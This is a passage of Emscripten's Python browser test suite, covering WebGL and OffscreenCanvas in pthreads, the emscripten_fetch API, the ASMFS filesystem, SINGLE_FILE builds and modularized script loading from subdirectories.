self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
self.clear()
os.makedirs('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
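# Test UTF-8 and UTF-16 string conversion (UTF8ToString, UTF16ToString, stringToUTF16, lengthBytesUTF16) against embedded corpus files.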
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
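# Compare generated code size for the three TEXTDECODER modes: 0 (JS fallback only), default (TextDecoder plus fallback) and 2 (TextDecoder only, no fallback). The build without the fallback should be the smallest, and the default build the largest.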
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
@requires_threads
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'USE_WEBGL2=0', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'USE_WEBGL2=0'],
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'USE_WEBGL2=1'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it by using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transfer of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for args in [[], ['-DTEST_OFFSCREEN_CANVAS=1'], ['-DTEST_OFFSCREEN_CANVAS=2']]:
cmd = args + ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
# Tests the feature that the shell html page can preallocate the typed array and place it in Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
@no_chrome('depends on moz-chunked-arraybuffer')
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when the user passes none of the main 3 flags (append/replace/no_download).
# In that case, append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_wasm_backend("fetch API uses an asm.js based web worker to run synchronous XHRs and IDB operations")
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args, timeout=30)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9062')
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'MODULARIZE_INSTANCE=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9065')
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
  # Tests that Emscripten-compiled applications can be run from a relative path in a browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
  # Similar to `test_browser_run_from_different_directory`, but
  # also we eval the initial code, so currentScript is not present. That prevents us
  # from finding the file in a subdir, but here we at least check that we do not regress compared to the
  # normal case of finding it in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
if not os.path.exists(filesystem_path):
os.makedirs(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
